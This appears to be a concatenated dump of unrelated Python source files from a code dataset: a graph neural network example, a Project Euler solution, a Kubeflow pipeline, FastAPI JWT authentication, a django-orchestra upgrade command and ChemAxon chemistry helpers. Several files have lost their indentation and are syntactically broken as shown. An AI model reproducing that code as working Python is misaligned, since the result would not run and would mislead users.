The configuration at the top of the file is the best one identified in the
paper, and should work well for many different datasets without changes.
Note: the results reported in the paper are averaged over 3 random repetitions
with an 80/20 split.
"""
import numpy as np
import tensorflow as tf
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.metrics import categorical_accuracy
from tensorflow.keras.optimizers import Adam
from spektral.data import DisjointLoader
from spektral.datasets import TUDataset
from spektral.models import GeneralGNN
physical_devices = tf.config.list_physical_devices("GPU")
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
################################################################################
# Config
################################################################################
batch_size = 32
learning_rate = 0.01
epochs = 400
################################################################################
# Load data
################################################################################
data = TUDataset("PROTEINS")
# Train/test split
np.random.shuffle(data)
split = int(0.8 * len(data))
data_tr, data_te = data[:split], data[split:]
# Data loaders
loader_tr = DisjointLoader(data_tr, batch_size=batch_size, epochs=epochs)
loader_te = DisjointLoader(data_te, batch_size=batch_size)
################################################################################
# Build model
################################################################################
model = GeneralGNN(data.n_labels, activation="softmax")
optimizer = Adam(learning_rate)
loss_fn = CategoricalCrossentropy()
################################################################################
# Fit model
################################################################################
@tf.function(input_signature=loader_tr.tf_signature(), experimental_relax_shapes=True)
def train_step(inputs, target):
with tf.GradientTape() as tape:
predictions = model(inputs, training=True)
loss = loss_fn(target, predictions) + sum(model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
acc = tf.reduce_mean(categorical_accuracy(target, predictions))
return loss, acc
def evaluate(loader):
output = []
step = 0
while step < loader.steps_per_epoch:
step += 1
inputs, target = loader.__next__()
pred = model(inputs, training=False)
outs = (
loss_fn(target, pred),
tf.reduce_mean(categorical_accuracy(target, pred)),
len(target), # Keep track of batch size
)
output.append(outs)
if step == loader.steps_per_epoch:
output = np.array(output)
return np.average(output[:, :-1], 0, weights=output[:, -1])
epoch = step = 0
results = []
for batch in loader_tr:
step += 1
loss, acc = train_step(*batch)
results.append((loss, acc))
if step == loader_tr.steps_per_epoch:
step = 0
epoch += 1
results_te = evaluate(loader_te)
print(
"Ep. {} - Loss: {:.3f} - Acc: {:.3f} - Test loss: {:.3f} - Test acc: {:.3f}".format(
epoch, *np.mean(results, 0), *results_te
)
)
results = []
################################################################################
# Evaluate model
################################################################################
results_te = evaluate(loader_te)
print("Final results - Loss: {:.3f} - Acc: {:.3f}".format(*results_te))
| 2.640625 | 3 |
problems/044.py | JoshKarpel/Euler | 1 | 12786323 | <filename>problems/044.py
from math import sqrt
import collections
from problems import utils
@utils.memoize
def pentagon(n):
return int(n * ((3 * n) - 1) / 2)
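# Pentagonal numbers follow P(n) = n(3n - 1)/2, so the first few values are
# P(1) = 1, P(2) = 5, P(3) = 12, P(4) = 22. solve() below searches for a pair
# P(m), P(n) whose sum and difference are both pentagonal and returns that
# difference (assumed minimal within the fixed search bound).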
def solve():
upper_bound = 3000
pentagons = set((pentagon(n) for n in range(1, upper_bound)))
for n in range(1, upper_bound):
p_n = pentagon(n)
for m in range(1, n):
p_m = pentagon(m)
if p_n - p_m in pentagons and p_n + p_m in pentagons:
return p_n - p_m
if __name__ == '__main__':
print(solve())
| 3.75 | 4 |
kfp_fashion_mnist.py | JavaDerek/FashionMnistKF | 3 | 12786324 | import kfp.dsl as dsl
class ObjectDict(dict):
def __getattr__(self, name):
if name in self:
return self[name]
else:
raise AttributeError("No such attribute: " + name)
@dsl.pipeline(
name='fashion mnist',
description='Train and Deploy Fashion MNIST'
)
def train_and_deploy(
download_and_preprocess="full"
):
# Step 1: download and store data in pipeline
download = dsl.ContainerOp(
name='download',
# image needs to be a compile-time string
image='docker.io/dotnetderek/download:latest',
arguments=[
download_and_preprocess
],
file_outputs={
'trainImages':'/trainImagesObjectName.txt',
'trainLabels':'/trainLabelsObjectName.txt',
'testImages':'/testImagesObjectName.txt',
'testLabels':'/testLabelsObjectName.txt'
}
)
# Step 2: normalize data between 0 and 1
preprocess = dsl.ContainerOp(
name='preprocess',
# image needs to be a compile-time string
image='docker.io/dotnetderek/preprocess:latest',
arguments=[
download.outputs['trainImages'],
download.outputs['trainLabels'],
download.outputs['testImages'],
download.outputs['testLabels'],
download_and_preprocess
],
file_outputs={
'normalizedTrainImages':'/trainImagesObjectName.txt',
'normalizedTestImages':'/testImagesObjectName.txt'
}
)
# Step 3: train a model
train = dsl.ContainerOp(
name='train',
# image needs to be a compile-time string
image='docker.io/dotnetderek/train:latest',
arguments=[
preprocess.outputs['normalizedTrainImages'],
download.outputs['trainLabels']
],
file_outputs={
'trainedModelName':'/trainedModelName.txt'
}
)
# Step 4: evaluate model
evaluate = dsl.ContainerOp(
name='evaluate',
# image needs to be a compile-time string
image='docker.io/dotnetderek/evaluate:latest',
arguments=[
preprocess.outputs['normalizedTestImages'],
download.outputs['testLabels'],
train.outputs['trainedModelName']
],
file_outputs={
}
)
if __name__ == '__main__':
import kfp.compiler as compiler
import sys
if len(sys.argv) != 2:
print("Usage: kfp_fashion_mnist pipeline-output-name")
sys.exit(-1)
filename = sys.argv[1]
compiler.Compiler().compile(train_and_deploy, filename) | 2.765625 | 3 |
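# Example invocation (hypothetical output file name): compiles the pipeline
# defined above into an archive that can be uploaded to a Kubeflow Pipelines
# instance.
#   python kfp_fashion_mnist.py fashion_mnist_pipeline.tar.gz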
fastapi_crud_orm_connector/api/auth.py | christinoleo/fastapi_crud_orm_connector | 0 | 12786325 | <reponame>christinoleo/fastapi_crud_orm_connector<filename>fastapi_crud_orm_connector/api/auth.py
from fastapi import Depends, HTTPException, status
from jose import jwt, JWTError
from fastapi_crud_orm_connector import schemas
from fastapi_crud_orm_connector.api import security
from fastapi_crud_orm_connector.utils.database_session import DatabaseSession
class Authentication:
def __init__(self, database_session: DatabaseSession, user_crud, secret_key: str, algorithm: str = "HS256"):
self.secret_key = secret_key
self.algorithm = algorithm
self.user_crud = user_crud
self.database_session = database_session
self.get_db = self.database_session.get_db
async def _get_current_user(db=Depends(database_session.get_db), token: str = Depends(security.oauth2_scheme)):
credentials_exception = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Could not validate credentials",
headers={"WWW-Authenticate": "Bearer"},
)
try:
payload = jwt.decode(
token, self.secret_key, algorithms=[self.algorithm]
)
email: str = payload.get("sub")
if email is None:
raise credentials_exception
permissions: str = payload.get("permissions")
token_data = schemas.TokenData(email=email, permissions=permissions)
except JWTError:
raise credentials_exception
user = user_crud.use_db(db).get_user_by_email(token_data.email)
if user is None:
raise credentials_exception
return user
async def _get_current_active_user(current_user=Depends(_get_current_user)):
if not current_user.is_active:
raise HTTPException(status_code=400, detail="Inactive user")
return current_user
async def _get_current_active_superuser(current_user=Depends(_get_current_user), ):
if not current_user.is_superuser:
raise HTTPException(
status_code=403, detail="The user doesn't have enough privileges"
)
return current_user
self.get_current_user = _get_current_user
self.get_current_active_user = _get_current_active_user
self.get_current_active_superuser = _get_current_active_superuser
def authenticate_user(self, db, email: str, password: str):
user = self.user_crud.use_db(db).get_user_by_email(email, include_password=True)
if not user:
return False
if not security.verify_password(password, user.hashed_password):
return False
return user
def sign_up_new_user(self, db, email: str, password: str):
user = self.user_crud.use_db(db).get_user_by_email(email)
if user:
return False # User already exists
new_user = self.user_crud.use_db(db).create_user(
schemas.UserCreate(
email=email,
password=password,
is_active=True,
is_superuser=False,
),
)
return new_user
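# Usage sketch (not part of the module): wiring the dependencies into a FastAPI
# app. `SECRET_KEY`, `db_session`, and `user_crud` are placeholders for objects
# created elsewhere in the application.
#   from fastapi import FastAPI, Depends
#   app = FastAPI()
#   auth = Authentication(db_session, user_crud, secret_key=SECRET_KEY)
#   @app.get("/users/me")
#   async def read_me(current_user=Depends(auth.get_current_active_user)):
#       return current_user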
| 2.28125 | 2 |
orchestra/management/commands/upgradeorchestra.py | udm88/django-orchestra | 68 | 12786326 | <gh_stars>10-100
import functools
import os
import random
import string
from distutils.sysconfig import get_python_lib
from optparse import make_option
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from orchestra import get_version
from orchestra.utils.sys import run, check_root
r = functools.partial(run, silent=False)
def get_existing_pip_installation():
""" returns current pip installation path """
if run("pip freeze|grep django-orchestra", valid_codes=(0,1)).exit_code == 0:
for lib_path in get_python_lib(), get_python_lib(prefix="/usr/local"):
existing_path = os.path.abspath(os.path.join(lib_path, "orchestra"))
if os.path.exists(existing_path):
return existing_path
return None
class Command(BaseCommand):
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
self.option_list = BaseCommand.option_list + (
make_option('--pip_only', action='store_true', dest='pip_only', default=False,
help='Only run "pip install django-orchestra --upgrade"'),
make_option('--orchestra_version', dest='version', default=False,
help='Specifies what version of the Orchestra you want to install'),
)
option_list = BaseCommand.option_list
help = "Upgrading Orchestra's installation. Desired version is accepted as argument"
can_import_settings = False
leave_locale_alone = True
@check_root
def handle(self, *args, **options):
current_version = get_version()
current_path = get_existing_pip_installation()
if current_path is not None:
desired_version = options.get('version')
if args:
desired_version = args[0]
if current_version == desired_version:
msg = "Not upgrading, you already have version %s installed"
raise CommandError(msg % desired_version)
# Create a backup of current installation
base_path = os.path.abspath(os.path.join(current_path, '..'))
char_set = string.ascii_uppercase + string.digits
rand_name = ''.join(random.sample(char_set, 6))
backup = os.path.join(base_path, 'orchestra.' + rand_name)
run("mv %s %s" % (current_path, backup))
# collect existing eggs previous to the installation
eggs_regex = os.path.join(base_path, 'django_orchestra-*.egg-info')
eggs = run('ls -d %s' % eggs_regex)
eggs = eggs.stdout.splitlines()
try:
if desired_version:
r('pip install django-orchestra==%s' % desired_version)
else:
                    # Did I mention how I hate PIP?
if run('pip --version|cut -d" " -f2').stdout == '1.0':
r('pip install django-orchestra --upgrade')
else:
# (Fucking pip)^2, it returns exit code 0 even when fails
# because requirement already up-to-date
r('pip install django-orchestra --upgrade --force')
except CommandError:
# Restore backup
run('rm -rf %s' % current_path)
run('mv %s %s' % (backup, current_path))
raise CommandError("Problem runing pip upgrade, aborting...")
else:
                # Some old versions of pip do not perform this cleaning ...
# Remove all backups
run('rm -fr %s' % os.path.join(base_path, 'orchestra\.*'))
# Clean old egg files, yeah, cleaning PIP shit :P
c_version = 'from orchestra import get_version; print get_version()'
version = run('python -c "%s;"' % c_version).stdout
for egg in eggs:
# Do not remove the actual egg file when upgrading twice the same version
if egg.split('/')[-1] != "django_orchestra-%s.egg-info" % version:
run('rm -fr %s' % egg)
else:
raise CommandError("You don't seem to have any previous PIP installation")
# version specific upgrade operations
if not options.get('pip_only'):
call_command("postupgradeorchestra", version=current_version)
| 2.0625 | 2 |
src/uwds3_human_description/human_visual_model.py | uwds3/uwds3_human_description | 0 | 12786327 | <filename>src/uwds3_human_description/human_visual_model.py<gh_stars>0
import numpy as np
from sensor_msgs.msg import CameraInfo
class HumanVisualModel(object):
FOV = 60.0 # human field of view
WIDTH = 90 # image width resolution for rendering
HEIGHT = 68 # image height resolution for rendering
CLIPNEAR = 0.3 # clipnear
CLIPFAR = 1e+3 # clipfar
ASPECT = 1.333 # aspect ratio for rendering
SACCADE_THRESHOLD = 0.01 # angular variation in rad/s
SACCADE_ESPILON = 0.005 # error in angular variation
FOCUS_DISTANCE_FIXATION = 0.1 # focus distance when performing a fixation
FOCUS_DISTANCE_SACCADE = 0.5 # focus distance when performing a saccade
def get_camera_info(self):
camera_info = CameraInfo()
width = HumanVisualModel.WIDTH
height = HumanVisualModel.HEIGHT
camera_info.width = width
camera_info.height = height
focal_length = height
center = (height/2, width/2)
camera_matrix = np.array([[focal_length, 0, center[0]],
[0, focal_length, center[1]],
[0, 0, 1]], dtype="double")
P_matrix = np.array([[focal_length, 0, center[0], 0],
[0, focal_length, center[1], 0],
[0, 0, 1, 0]], dtype="double")
dist_coeffs = np.zeros((4, 1))
camera_info.distortion_model = "blob"
camera_info.D = list(dist_coeffs)
camera_info.K = list(camera_matrix.flatten())
camera_info.P = list(P_matrix.flatten())
return camera_info
| 2.390625 | 2 |
src/app/data/mongopython.py | vaiskuma/Angular-first-App | 0 | 12786328 | import pymongo
from pymongo import MongoClient
connection = MongoClient()
#client = MongoClient('localhost', 27017)
# The client object is thread-safe and has connection pooling built in.
# If an operation fails because of a network error, ConnectionFailure is raised
# and the client reconnects in the background. Application code should handle
# this exception (recognizing that the operation failed) and then continue to execute.
# connect to the students database and the ctec121 collection
#db = connection.students.ctec121
db = connection.napp
collection = db.users
collection.find_one({"name":"name1"})
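# Illustrative follow-up (assumes pymongo >= 3 and that the "napp.users"
# collection above is reachable): insert a sample document and show that
# find_one() can retrieve it.
user = {"name": "name1", "email": "name1@example.com"}
collection.insert_one(user)
print(collection.find_one({"name": "name1"}))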
| 2.9375 | 3 |
Chapter01/19_iterator_example.py | add54/ADMIN_SYS_PYTHON | 116 | 12786329 | <filename>Chapter01/19_iterator_example.py<gh_stars>100-1000
numbers = [10, 20, 30, 40]
numbers_iter = iter(numbers)
print(next(numbers_iter))
print(next(numbers_iter))
print(numbers_iter.__next__())
print(numbers_iter.__next__())
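# the four calls above exhausted the iterator, so this final call raises StopIteration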
next(numbers_iter)
| 3.375 | 3 |
tasks/task0018.py | jtprogru/interview-task | 3 | 12786330 | <reponame>jtprogru/interview-task
"""
Write a function that reverses a string. The input string is given as an array of characters s.
You must do this by modifying the input array in-place with O(1) extra memory.
Example 1:
Input: s = ["h","e","l","l","o"]
Output: ["o","l","l","e","h"]
Example 2:
Input: s = ["H","a","n","n","a","h"]
Output: ["h","a","n","n","a","H"]
Constraints:
- 1 <= s.length <= 10^5
- s[i] is a printable ascii character.
"""
from typing import List
def solution(s: List[str]) -> None:
start = 0
end = len(s) - 1
while start < end:
s[start], s[end] = s[end], s[start]
start += 1
end -= 1
| 3.984375 | 4 |
chemaxon.py | weishuzhao/group-contribution | 8 | 12786331 | <gh_stars>1-10
from subprocess import Popen, PIPE
import openbabel
import logging
import numpy as np
import StringIO
import re, csv
from rdkit import Chem
from rdkit.ML.Descriptors.MoleculeDescriptors import MolecularDescriptorCalculator
#from rdkit.Chem import Descriptors, GraphDescriptors, rdMolDescriptors #the list below defines all molecular descriptors available
class ChemAxonError(Exception):
pass
def RunCxcalc(molstring, args):
"""
Call cxcalc argument of ChemAxon from command line
:param molstring: smiles form or InChI strings of the molecule
:param args: name of molecular descriptors processed by cxcalc
    :return: output from command line cxcalc requiring further processing
"""
CXCALC_BIN = "cxcalc"
devnull = open('/dev/null', 'w')
try:
p1 = Popen(["echo", molstring], stdout=PIPE)
p2 = Popen([CXCALC_BIN] + args, stdin=p1.stdout,
executable=CXCALC_BIN, stdout=PIPE, stderr=devnull)
logging.debug("INPUT: echo %s | %s" % (molstring, ' '.join([CXCALC_BIN] + args)))
#p.wait()
#os.remove(temp_fname)
res = p2.communicate()[0]
if p2.returncode != 0:
            raise ChemAxonError(' '.join([CXCALC_BIN] + args))
logging.debug("OUTPUT: %s" % res)
return res
except OSError:
raise Exception("Marvin (by ChemAxon) must be installed to calculate pKa data.")
def Molconvert(molstring, args):
"""
Call molconvert argument of ChemAxon from command line
:param molstring: smiles form or InChI strings of the molecule
:param args: name of molecular descriptors processed by molconvert
    :return: output from command line molconvert requiring further processing
"""
MOLCONV_BIN = "molconvert"
devnull = open('/dev/null', 'w')
try:
p1 = Popen(["echo", molstring], stdout=PIPE)
p2 = Popen([MOLCONV_BIN] + args, stdin=p1.stdout,
executable=MOLCONV_BIN, stdout=PIPE, stderr=devnull)
logging.debug("INPUT: echo %s | %s" % (molstring, ' '.join([MOLCONV_BIN] + args)))
#p.wait()
#os.remove(temp_fname)
res = p2.communicate()[0]
if p2.returncode != 0:
            raise ChemAxonError(' '.join([MOLCONV_BIN] + args))
logging.debug("OUTPUT: %s" % res)
return res
except OSError:
raise Exception("Marvin (by ChemAxon) must be installed")
def inchi2smiles(inchi):
openbabel.obErrorLog.SetOutputLevel(-1)
conv = openbabel.OBConversion()
conv.SetInAndOutFormats('inchi', 'smiles')
# conv.AddOption("F", conv.OUTOPTIONS)
# conv.AddOption("T", conv.OUTOPTIONS)
# conv.AddOption("x", conv.OUTOPTIONS, "noiso")
# conv.AddOption("w", conv.OUTOPTIONS)
obmol = openbabel.OBMol()
conv.ReadString(obmol, str(inchi))
smiles = conv.WriteString(obmol, True) # second argument is trimWhitespace
if smiles == '':
return None
else:
return smiles
def smiles2inchi(smiles):
openbabel.obErrorLog.SetOutputLevel(-1)
conv = openbabel.OBConversion()
conv.SetInAndOutFormats('smiles', 'inchi')
conv.AddOption("F", conv.OUTOPTIONS)
conv.AddOption("T", conv.OUTOPTIONS)
conv.AddOption("x", conv.OUTOPTIONS, "noiso")
conv.AddOption("w", conv.OUTOPTIONS)
obmol = openbabel.OBMol()
conv.ReadString(obmol, str(smiles))
inchi = conv.WriteString(obmol, True) # second argument is trimWhitespace
if inchi == '':
return None
else:
return inchi
def GetFormulaAndCharge(molstring):
"""
:param molstring: smiles form or InChI strings of the molecule
:return: chemical formula and charge of the molecule
"""
args = ['formula', 'formalcharge']
output = RunCxcalc(molstring, args)
# the output is a tab separated table whose columns are:
# id, Formula, Formal charge
f = StringIO.StringIO(output)
tsv_output = csv.reader(f, delimiter='\t')
headers = tsv_output.next()
if headers != ['id', 'Formula', 'Formal charge']:
raise ChemAxonError('cannot get the formula and charge for: ' + molstring)
_, formula, formal_charge = tsv_output.next()
try:
formal_charge = int(formal_charge)
except ValueError:
formal_charge = 0
return formula, formal_charge
def GetAtomBagAndCharge(molstring):
"""
:param molstring: smiles form or InChI strings of the molecule
    :return: - a dictionary mapping each atom type to the number of such atoms in the molecule
             - charge of the molecule
"""
formula, formal_charge = GetFormulaAndCharge(molstring)
atom_bag = {}
for mol_formula_times in formula.split('.'):
for times, mol_formula in re.findall('^(\d+)?(\w+)', mol_formula_times):
if not times:
times = 1
else:
times = int(times)
for atom, count in re.findall("([A-Z][a-z]*)([0-9]*)", mol_formula):
if count == '':
count = 1
else:
count = int(count)
atom_bag[atom] = atom_bag.get(atom, 0) + count * times
return atom_bag, formal_charge
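# Illustrative example (requires a working ChemAxon cxcalc installation): for
# acetate, GetAtomBagAndCharge("CC(=O)[O-]") is expected to return
# ({'C': 2, 'H': 3, 'O': 2}, -1).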
def _GetDissociationConstants(molstring, n_acidic=20, n_basic=20, pH=7.0):
"""
:param molstring: smiles form or InChI strings of the molecule
:return: A pair of (pKa list, major pseudoisomer)
- pKa list is of a list of pKa values in ascending order.
- the major pseudoisomer is a SMILES string of the major species at the given pH.
"""
args = []
if n_acidic + n_basic > 0:
args += ['pka', '-a', str(n_acidic), '-b', str(n_basic),
'majorms', '-M', 'true', '--pH', str(pH)]
output = RunCxcalc(molstring, args)
atom2pKa, smiles_list = ParsePkaOutput(output, n_acidic, n_basic)
all_pKas = []
for pKa_list in atom2pKa.values():
all_pKas += [pKa for pKa, _ in pKa_list]
return sorted(all_pKas), smiles_list
def ParsePkaOutput(s, n_acidic, n_basic):
"""
    :param s: raw cxcalc pKa output string
    :return: (atom2pKa, smiles_list) - atom2pKa maps each atom index to a list of
        (pKa, 'acid'/'base') pairs assigned to that atom; smiles_list contains the
        SMILES of the major microspecies.
"""
atom2pKa = {}
pkaline = s.split('\n')[1]
splitline = pkaline.split('\t')
splitline.pop(0)
if n_acidic + n_basic > 0:
if len(splitline) != (n_acidic + n_basic + 2):
raise ChemAxonError('ChemAxon failed to find any pKas')
pKa_list = []
acid_or_base_list = []
for i in range(n_acidic + n_basic):
x = splitline.pop(0)
if x == '':
continue
pKa_list.append(float(x))
if i < n_acidic:
acid_or_base_list.append('acid')
else:
acid_or_base_list.append('base')
atom_list = splitline.pop(0)
if atom_list: # a comma separated list of the deprotonated atoms
atom_numbers = [int(x)-1 for x in atom_list.split(',')]
for i, j in enumerate(atom_numbers):
atom2pKa.setdefault(j, [])
atom2pKa[j].append((pKa_list[i], acid_or_base_list[i]))
smiles_list = splitline
return atom2pKa, smiles_list
def GetDissociationConstants(molstring, n_acidic=20, n_basic=20, pH=7):
"""
Get pKas and major microspecies of the molecule
:param molstring: smiles form or InChI strings of the molecule
:param n_acidic: the max no. of acidic pKas to calculate
:param n_basic: the max no. of basic pKas to calculate
:param pH: the pH for which the major pseudoisomer is calculated
:return: (all_pKas, major_ms)
- all_pKas is a list of floats (pKa values)
- major_ms is a SMILES string of the major pseudoisomer at pH_mid
"""
all_pKas, smiles_list = _GetDissociationConstants(molstring, n_acidic,
n_basic, pH)
major_ms = smiles_list[0]
pKas = sorted([pka for pka in all_pKas if pka > 0 and pka < 13], reverse=True)
return pKas, major_ms
def Get_pKas_Hs_zs_pH7smiles(molstring):
"""
:param molstring: smiles form or InChI strings of the molecule
    :return: a list of pKas, a list of H atom counts for each protonation state, a list of charges,
             the index of the major species at pH 7, and the smiles form of the major species at pH 7
"""
pKas, major_ms_smiles = GetDissociationConstants(molstring)
pKas = sorted([pka for pka in pKas if pka > 0 and pka < 13], reverse=True)
#print major_ms_smiles
if major_ms_smiles:
atom_bag, major_ms_charge = GetAtomBagAndCharge(major_ms_smiles)
major_ms_nH = atom_bag.get('H', 0)
else:
atom_bag = {}
major_ms_charge = 0
major_ms_nH = 0
n_species = len(pKas) + 1
if pKas == []:
majorMSpH7 = 0
else:
majorMSpH7 = len([1 for pka in pKas if pka > 7])
nHs = []
zs = []
for i in xrange(n_species):
zs.append((i - majorMSpH7) + major_ms_charge)
nHs.append((i - majorMSpH7) + major_ms_nH)
return pKas, nHs, zs, majorMSpH7, major_ms_smiles
def Calculate_total_Steric_hindrance(molstring):
"""
:param molstring: smiles form or InChI strings of the molecule
:return: total steric hindrance of the molecule
"""
# convert to smiles form if it is InChI string
if "InChI=" in molstring:
molstring = inchi2smiles(molstring)
molstring_with_explicit_Hs = Molconvert(molstring, ['smiles:H']).split('\n')[0]
steric_hindrance = sorted(map(float, RunCxcalc(molstring_with_explicit_Hs,['sterichindrance','-l','always']).split('\n')[1].split('\t')[1].split(';')))
return sum(steric_hindrance)
def Find_pos_of_double_bond_O(molstring):
"""
:param molstring: smiles form or InChI string of the molecule
    :return: positions of double-bonded oxygen atoms in the list of atoms in molstring
"""
#convert to smiles form if it is InChI string
if "InChI=" in molstring:
molstring = inchi2smiles(molstring)
atoms_to_consider = ['C','O','N','S','P','c','n','Cl']
double_bond_O_pos = []
if 'O=C' in molstring:
double_bond_O_pos.append(0)
if 'O=c' in molstring:
double_bond_O_pos.append(0)
molstring_split_by_double_bond_O = molstring.split('=O')
if len(molstring_split_by_double_bond_O) > 1:
atom_num_in_fragments = []
for smiles_fragment in molstring_split_by_double_bond_O:
atom_num_in_fragments.append(sum([smiles_fragment.count(cur_atom) for cur_atom in atoms_to_consider]))
double_bond_O_pos_real = np.cumsum([atom_num + 1 for atom_num in atom_num_in_fragments])[:-1] #not counting from 0
double_bond_O_python_pos = list(np.array(double_bond_O_pos_real) - 1)
else:
double_bond_O_python_pos = []
double_bond_O_pos += double_bond_O_python_pos
return double_bond_O_pos
def Extract_individual_atom_partial_charge_and_labels(molstring):
"""
:param molstring: smiles form or InChI string of the molecule
:return: (atom_labels, atom_partial_charge)
- atom_labels is a list of atoms in the molecule specified by the their atom type
- atom_partial_charge is a list of partial charge for each atom in the molecule
"""
#convert to smiles form if it is InChI string
if "InChI=" in molstring:
molstring = inchi2smiles(molstring)
partial_charge_output = RunCxcalc(molstring, ['-M','charge','-i','True','-p','3'])
#depending on smiles, the partial charge output from chemaxon can have two different formats
if len(partial_charge_output.split('</atom>')) > 1:
#one particular output format
atom_labels = [re.findall('elementType=(.*)',element)[0].strip('"')[0] for element in partial_charge_output.split('</atom>') if 'elementType' in element]
atom_partial_charge = [re.findall('mrvExtraLabel=(.*) x2',element)[0].strip('"') for element in partial_charge_output.split('</atom>') if 'elementType' in element]
else:
#another particular output format
if 'formalCharge' in partial_charge_output:
atom_labels = re.findall('elementType=(.*) formalCharge',partial_charge_output)[0].strip('"').split(' ')
else:
atom_labels = re.findall('elementType=(.*) mrvExtraLabel',partial_charge_output)[0].strip('"').split(' ')
atom_partial_charge = re.findall('mrvExtraLabel=(.*) x2=',partial_charge_output)[0].strip('"').split(' ')
return atom_labels, atom_partial_charge
def Extract_atom_partial_charge(molstring, absolute_charge = True):
"""
Extract the total absolute partial charge for each type of atom
:param molstring: smiles form or InChI string of the molecule
    :param absolute_charge: whether to take the absolute value of each atom's partial charge when computing the total partial charge
:return: a dictionary with keys being atom type, values being total absolute partial charge of the type of atom
"""
#convert to smiles form if it is InChI string
if "InChI=" in molstring:
molstring = inchi2smiles(molstring)
atom_charge_dict = {'C':[],'H':[],'O':[],'O_double':[],'N':[],'S':[],'P':[],'Cl':[],'F':[],'Br':[],'I':[]} #Br and I as placeholder, currently don't have data to predict compounds containing these elements
total_charge_dict = {}
atom_labels, atom_partial_charge = Extract_individual_atom_partial_charge_and_labels(molstring)
double_bond_O_pos = Find_pos_of_double_bond_O(molstring)
H_charge_list = [float(re.findall('\((.*)\)',partial_charge)[0]) for partial_charge in atom_partial_charge if '(' in partial_charge]
#atom_labels correspond to all_other_atoms_charge_list
all_other_atoms_charge_list = [float(partial_charge.split('\\')[0]) for partial_charge in atom_partial_charge]
for i, atom_type in enumerate(atom_labels):
if atom_type == 'O':
if i in double_bond_O_pos:
atom_charge_dict['O_double'].append(all_other_atoms_charge_list[i])
else:
atom_charge_dict['O'].append(all_other_atoms_charge_list[i])
else:
atom_charge_dict[atom_type].append(all_other_atoms_charge_list[i])
if H_charge_list != []:
atom_charge_dict['H'] += H_charge_list
for atom_type, charge_list in atom_charge_dict.iteritems():
if charge_list != []:
if absolute_charge == True:
total_charge_dict[atom_type] = np.sum(abs(np.array(charge_list)))
else:
total_charge_dict[atom_type] = np.sum(np.array(charge_list))
return total_charge_dict
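    # Illustrative output shape (charge values are hypothetical): for an
    # acetate-like input the result might look like
    #   {'C': 0.62, 'H': 0.31, 'O': 0.40, 'O_double': 0.47}
    # i.e. one key per atom type present, holding the summed (absolute) partial charge.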
def Calculate_total_atom_num_and_partial_charge(molstring):
"""
:param molstring: smiles form or InChI string of the molecule
:return: a list of total atom number and absolute partial charge for each atom type
[C_partial_charge, C_atom_num, H_partial_charge, H_atom_num, O_partial_charge, O_atom_num, O_double_partial_charge, O_double_atom_num,
N_partial_charge, N_atom_num, S_partial_charge, S_atom_num, P_partial_charge, P_atom_num, F_partial_charge, F_atom_num, Cl_partial_charge, Cl_atom_num]
"""
cur_total_atom_num_partial_charge_array = []
atom_bag, _ = GetAtomBagAndCharge(molstring)
double_bond_O_num = len(Find_pos_of_double_bond_O(molstring))
if 'O' in atom_bag.keys():
single_bond_O_num = atom_bag['O'] - double_bond_O_num
atom_bag['O'] = single_bond_O_num
atom_bag['O_double'] = double_bond_O_num
partial_charge_dict = Extract_atom_partial_charge(molstring)
for atom_type in ['C','H','O','O_double','N','S','P','F','Cl']:
if atom_type in partial_charge_dict.keys():
cur_total_atom_num_partial_charge_array.append(partial_charge_dict[atom_type])
else:
cur_total_atom_num_partial_charge_array.append(0.0)
if atom_type in atom_bag.keys():
cur_total_atom_num_partial_charge_array.append(atom_bag[atom_type])
else:
cur_total_atom_num_partial_charge_array.append(0.0)
#total atomcount covered in molecular properties calculation
#cur_total_atom_num_partial_charge_array.append(sum(atom_bag.values()))
return cur_total_atom_num_partial_charge_array
def Calculate_chemaxon_mol_properties(molstring):
"""
Calculate the molecular descriptors available in ChemAxon
:param molstring: smiles form or InChI string of the molecule
:return: a list of ChemAxon molecular descriptors of the molecule
"""
args = ['atomcount','exactmass','averagemolecularpolarizability','axxpol','ayypol','azzpol','formalcharge',\
'molecularpolarizability','aliphaticatomcount','aliphaticbondcount','aliphaticringcount','aromaticatomcount',\
'aromaticbondcount','aromaticringcount','asymmetricatomcount','balabanindex','bondcount','carboaromaticringcount',\
'carboringcount','chainatomcount','chainbondcount','chiralcentercount','cyclomaticnumber','dreidingenergy',\
'fusedaromaticringcount','fusedringcount','hararyindex','heteroaliphaticringcount','heteroaromaticringcount',\
'heteroringcount','hyperwienerindex','largestringsize','largestringsystemsize','maximalprojectionarea',\
'maximalprojectionradius','maximalprojectionsize','minimalprojectionarea','minimalprojectionradius',\
'minimalprojectionsize','mmff94energy','molecularsurfacearea','plattindex','psa','randicindex','ringatomcount',\
'ringbondcount','ringcount','ringsystemcount','rotatablebondcount','smallestringsize','smallestringsystemsize',\
'stereodoublebondcount','szegedindex','volume','wienerindex','wienerpolarity','tautomercount','logp',\
'acceptorcount','acceptorsitecount','donorcount','donorsitecount','refractivity','resonantcount','asa','dipole']
chemaxon_output = RunCxcalc(molstring, args)
mol_property_names = chemaxon_output.split('\n')[0].split('\t')[1:]
mol_property_vals = chemaxon_output.split('\n')[1].split('\t')[1:]
try:
averagemicrospeciescharge = RunCxcalc(molstring, ['averagemicrospeciescharge']).split('\n')[1].split('\t')[2]
except IndexError:
averagemicrospeciescharge = RunCxcalc(molstring, ['formalcharge']).split('\n')[1].split('\t')[1]
mol_property_names.append('averagemicrospeciescharge')
mol_property_vals.append(averagemicrospeciescharge)
    #both failure modes below arise when a descriptor (e.g. logp) cannot be calculated for the smiles, such as H2 ([H][H]); substitute 0 and warn
property_error_count = 0
for i, cur_property_val in enumerate(mol_property_vals):
if cur_property_val == 'logp:FAILED' or cur_property_val == '':
mol_property_vals[i] = '0'
property_error_count += 1
if property_error_count > 0:
print 'Problem calculating logp for %s, the molecular properties calculated might not be correct' %molstring
mol_property_vals = map(float, mol_property_vals)
double_bond = float(molstring.count('=')); mol_property_vals.append(double_bond); mol_property_names.append('double_bond_count')
triple_bond = float(molstring.count('#')); mol_property_vals.append(triple_bond); mol_property_names.append('triple_bond_count')
#print mol_property_names
return mol_property_vals
